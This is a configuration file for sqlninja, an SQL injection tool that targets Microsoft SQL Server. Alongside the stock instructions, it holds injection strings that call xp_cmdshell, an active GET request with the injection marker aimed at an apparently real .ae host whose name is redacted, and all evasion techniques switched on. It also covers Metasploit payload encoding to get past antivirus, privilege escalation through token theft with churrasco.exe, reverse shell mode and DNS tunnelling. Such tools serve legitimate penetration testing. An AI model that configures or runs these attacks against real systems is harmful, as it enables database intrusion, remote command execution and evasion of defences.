#################################### SQLNINJA CONFIGURATION FILE #######

1. ###################################
2. # SQLNINJA CONFIGURATION FILE #
3. ###################################
4.  
5. # options are case sensitive
6. # see sqlninja-howto.html for more information and examples
7.  
8. ############ HTTP REQUEST ############
9. # The entire HTTP request, including the exploit string and a marker for the
10. # SQL command to execute (__SQL2INJECT__)
11. # Be sure to include the vulnerable parameter and the character sequence that
12. # allows us to start injecting commands. In general this means, at least:
13. # - an apostrophe (if the parameter is a string)
14. # - a semicolon (to end the original query)
15. # It must also include everything necessary to properly close the original
16. # query, like an appropriate number of closing brackets. Don't forget to
17. # URL-encode, where needed (e.g. a space must become '%20' or '+')
18. #
19. # For instance, if you need to inject something like the following:
20. # aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'--
21. # then parameter should look like this:
22. # aaa=1&bbb=x';__SQL2INJECT__
23. #
24. # Make sure that:
25. # 1. The --httprequest_start-- and-- httprequest_end-- markers are in place
26. # 2. All required headers are present
27. # 3. There are no spaces at the beginning of a line
28. # 4. There are not comment lines
29. # Consider copying the exact request that triggers the injection from a proxy
30. # intercept (e.g.: BurpSuite), if unsure
31. #
32. # GET EXAMPLE:
33. --httprequest_start--
34. GET http://?';__SQL2INJECT__ HTTP/1.0
35. Host: www.?.ae
36. User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
37. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
38. Accept-Language: en-us,en;q=0.7,it;q=0.3
39. Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
40. Content-Type: application/x-www-form-urlencoded
41. Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
42. Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
43. Connection: close
44. --httprequest_end--
45. #
46. # POST EXAMPLE: (The Content-Length Header is automatically added by sqlninja!)
47. # --httprequest_start--
48. # POST https://www.victim.com/page.asp HTTP/1.0
49. # Host: www.victim.com
50. # User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
51. # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
52. # Accept-Language: en-us,en;q=0.7,it;q=0.3
53. # Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
54. # Content-Type: application/x-www-form-urlencoded
55. # Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
56. # Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
57. # Connection: close
58. #
59. # vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah
60. # --httprequest_end--
61. #
62. # HEADER-BASED EXAMPLE:
63. # --httprequest_start--
64. # GET http://www.victim.com/page.asp HTTP/1.0
65. # Host: www.victim.com
66. # User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
67. # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
68. # Accept-Language: en-us,en;q=0.7,it;q=0.3
69. # Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
70. # Content-Type: application/x-www-form-urlencoded
71. # Cookie: VulnCookie=xxx'%3B__SQL2INJECT__
72. # Connection: close
73. # --httprequest_end--
74. #
75. # Note that in the last example the semicolon was encoded, otherwise the server would not
76. # parse __SQL2INJECT__ as part of VulnCookie
77.  
78. # Local host: your IP address (for backscan and revshell modes)
79. lhost = ?
80.  
81. # Interface to sniff when in backscan mode
82. device = eth1
83.  
84. # Evasion techniques to be used. Possible choices are:
85. # 1 - Query hex-encoding
86. # 2 - Comments as separators
87. # 3 - Random case
88. # 4 - Random URI encoding
89. # All techniques can be combined, so the following is legal:
90. evasion = 1234
91. # However, keep in mind that using too many techniques at once leads to very
92. # long queries, that might create problems when using GET. Default: no evasion
93. # evasion = 12
94.  
95. # Path to metasploit executable. Only needed if msfpayload and
96. # msfcli are not already in the path
97. msfpath = /pentest/exploits/framework2
98.  
99. # Encoder to use with msfencode. If the option is not present, no encoding
100. # is used. However, it's definitely recommended to use it, if you suspect that
101. # an AV is present. A list of available encoders can be retrieved by simply
102. # running "msfencoder -l"
103. # msfencoder = x86/shikata_ga_nai
104.  
105. # Number of times to encode the metasploit payload. Default: 5
106. # msfencodecount = 4
107.  
108. # If you can execute commands but SQL Server does not run as SYSTEM,
109. # you can use churrasco.exe to steal the appropriate token and escalate
110. # privileges. Enable this option to use churrasco.exe before executing
111. # a command. This is especially useful with the metasploit module and VNC
112. # Obviously, you first need to upload churrasco.exe using
113. # the upload module!
114. usechurrasco = no
115.  
116. # Proxy host to use (default: none)
117. # proxyhost = 127.0.0.1
118.  
119. # Proxy port to use (default: 8080)
120. # proxyport = 8080
121.  
122.  
123. # Domain to use for dnstunnel mode
124. domain = sqlninja.net
125.  
126. # tcpdump filter (optional)
127. # filter = src host x.x.x.x
128.  
129. # Backscan timeout after web request conclusion (Default: 5 secs)
130. timeout = 5
131.  
132. # Maximum hostname length for DNS tunnel (Max: 250 - Default: 250)
133. # hostnamelength = 250
134.  
135. # IP address to return to DNS queries (default: 10.255.255.254)
136. # resolvedip = 10.255.255.254
137.  
138. # Name of the procedure to use/create to launch commands. Default is
139. # "xp_cmdshell". If set to "NULL", openrowset+sp_oacreate will be used
140. # for each command
141. # xp_name = xp_cmdshell
142.  
143. # Time value for the WAITFOR during inference attack of fingerprint and
144. # bruteforce mode. A higher value makes things slower but will yeld more
145. # precise results against slow targets.
146. # Min: 3 seconds. Max: 59 seconds. Default: 5 seconds
147. blindtime = 10
148.  
149. # Number of script lines to upload with a single HTTP request. A higher number
150. # obviously means a faster upload. However, do not push this too high if your
151. # request contains very long parameters. Maximum is 30, and 10 is a default
152. # safe value providing already a good speed
153. # lines_per_request = 10
154.  
155. # If the remote server returns a custom error page instead of a standard
156. # HTTP error code (e.g. 500 Server Error), it is wise to set this value to
157. # some string that is present in such a page. This will help sqlninja in
158. # figuring out if things seem to be wrong
159. # errorstring = "an error has occurred"
160.  
161. # By default, sqlninja appends two hyphens to the injected query in order
162. # to comment out any spurious SQL code. This is good and works in
163. # approximately 99% of the cases. However, you might want to change this
164. # behavior in some very specific scenarios. Change this setting only if you
165. # really know what you are doing,
166. # Possible values: yes/no
167. # appendcomment = yes
168.  
169. # When using the Metasploit module DEP is not a problem anymore, since in
170. # all recent versions of the framework the stager will take care of it by
171. # itself. However, if needed you can still roll back to the old sqlninja
172. # behavior and disable DEP by whitelisting the stager with a call to
173. # xp_regwrite. To do so, set 'checkdep' to 'yes'
174. # checkdep = no
175.  
176. # You can override the standard marker used to detect where to inject the
177. # sql attack code. You will probably never need to change this
178. # sqlmarker = __SQL2INJECT__